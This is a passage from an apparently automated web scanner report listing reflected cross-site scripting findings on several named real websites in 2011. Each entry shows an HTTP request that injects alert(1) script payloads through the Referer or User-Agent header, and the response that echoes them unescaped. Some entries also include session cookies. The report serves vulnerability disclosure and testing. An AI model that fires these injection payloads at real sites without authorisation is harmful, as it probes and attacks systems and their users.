Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/press-center HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=9d7e3"-alert(1)-"3cfb654df82

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18385
Date: Sun, 17 Apr 2011 14:15:48 GMT
X-Varnish: 1858169352
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=9d7e3"-alert(1)-"3cfb654df82";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.280. http://www.eset.com/us/renew [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/renew

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91bf9"-alert(1)-"12531d7b5ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/renew HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=91bf9"-alert(1)-"12531d7b5ed

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18993
Date: Sun, 17 Apr 2011 14:15:49 GMT
X-Varnish: 1858169396
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>R
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=91bf9"-alert(1)-"12531d7b5ed";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.281. http://www.eset.com/us/rss [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/rss

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9f54"-alert(1)-"0b6f004dd10 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/rss HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=c9f54"-alert(1)-"0b6f004dd10

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 15197
Date: Sun, 17 Apr 2011 14:15:49 GMT
X-Varnish: 1858169423
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=c9f54"-alert(1)-"0b6f004dd10";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.282. http://www.eset.com/us/sitemap [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/sitemap

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 936d3"-alert(1)-"a91f278d403 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/sitemap HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=936d3"-alert(1)-"a91f278d403

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18971
Date: Sun, 17 Apr 2011 14:15:50 GMT
X-Varnish: 1858169450
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=936d3"-alert(1)-"a91f278d403";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.283. http://www.eset.com/us/store [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5491d"-alert(1)-"4a921ceb826 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=5491d"-alert(1)-"4a921ceb826

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38902
Date: Sun, 17 Apr 2011 14:15:56 GMT
X-Varnish: 1858169795
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
n
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=5491d"-alert(1)-"4a921ceb826";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...
4.284. http://www.gillmanauto.com/index.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gillmanauto.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71adf"><script>alert(1)</script>1fec5e9f872 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.gillmanauto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71adf"><script>alert(1)</script>1fec5e9f872

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:17:57 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Connection: close
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ssoid=63d339870a0a00d701afcf208d25b633;path=/
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: JSESSIONID=1qt0ejmih4m4o;path=/
Set-Cookie: lbpoolmember=3607170570.40475.0000; path=/
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Set-Cookie: ddcpoolid=CmsPoolA;path=/;

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms21.dealer.ddc p7070 -->

   <title>Gillman Acura, Honda, Nissan, Mitsubishi, Chevrolet, Subaru, Chrysler, Jeep, Dodge, GMC,
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=71adf"><script>alert(1)</script>1fec5e9f872&amp;20=www.gillmanauto.com&amp;21=/index.htm&amp;50=63d339870a0a00d701afcf208d25b633&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=
...[SNIP]...
4.285. http://www.gillmanauto.com/index.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gillmanauto.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7633a'-alert(1)-'b4f5a8fc932 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.gillmanauto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7633a'-alert(1)-'b4f5a8fc932

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:18:13 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
Connection: close
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ssoid=63d376310a0a0043011b315c10d03de5;path=/
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: JSESSIONID=491h82iwsa0mj;path=/
Set-Cookie: lbpoolmember=1728122378.40475.0000; path=/
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Set-Cookie: ddcpoolid=CmsPoolA;path=/;

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms26.dealer.ddc p7070 -->

   <title>Gillman Acura, Honda, Nissan, Mitsubishi, Chevrolet, Subaru, Chrysler, Jeep, Dodge, GMC,
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=7633a'-alert(1)-'b4f5a8fc932',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...
4.286. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7e581<script>alert(1)</script>c42c55d61fb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7e581<script>alert(1)</script>c42c55d61fb
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Sun, 10 Apr 2011 15:38:15 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 16-Apr-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB186&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 24-Apr-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDAUARSRCQ=CMPPJFHBGBKPLPGCALJOOMCC; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 17 Apr 2011 14:18:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7e581<script>alert(1)</script>c42c55d61fb</b>
...[SNIP]...
4.287. http://www.haber.gen.tr/edit [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /edit

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e26e"><script>alert(1)</script>1b575ac794 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /edit HTTP/1.1
Host: www.haber.gen.tr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4e26e"><script>alert(1)</script>1b575ac794

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:52:24 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cfde59bd39590f4a9597ae2d4ea87408; path=/; domain=.haber.gen.tr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22947


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="http://www.google.com/search?hl=en&q=4e26e"><script>alert(1)</script>1b575ac794" type="hidden" />
...[SNIP]...
4.288. http://www.hollerclassic.com/index.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hollerclassic.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93436"><script>alert(1)</script>764517e4f23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.hollerclassic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=93436"><script>alert(1)</script>764517e4f23

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Date: Sun, 17 Apr 2011 14:19:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ssoid=63d4bcb70a0a002f017f2dac6e2cf94b;path=/
Set-Cookie: JSESSIONID=pr05wamio9av;path=/
Set-Cookie: ddcpoolid=CmsPoolP;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 54476

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7072 -->

   <title> | New Audi, Chevrolet, Honda, Hummer, Hyundai, Mazda dealership in Winter Park, FL 32789
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=93436"><script>alert(1)</script>764517e4f23&amp;20=www.hollerclassic.com&amp;21=/index.htm&amp;50=63d4bcb70a0a002f017f2dac6e2cf94b&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;8
...[SNIP]...
4.289. http://www.hollerclassic.com/index.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hollerclassic.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18a7b'-alert(1)-'9a5e8f0fc61 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.hollerclassic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=18a7b'-alert(1)-'9a5e8f0fc61

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Date: Sun, 17 Apr 2011 14:19:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ssoid=63d4c1830a0a002f017f2dacf05de77c;path=/
Set-Cookie: JSESSIONID=1cb1jpmleu3fv;path=/
Set-Cookie: ddcpoolid=CmsPoolP;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 54446

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7072 -->

   <title> | New Audi, Chevrolet, Honda, Hummer, Hyundai, Mazda dealership in Winter Park, FL 32789
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=18a7b'-alert(1)-'9a5e8f0fc61',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...
4.290. http://www.theautomastermercedesbenz.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e682'-alert(1)-'ef04afa0abc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=6e682'-alert(1)-'ef04afa0abc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
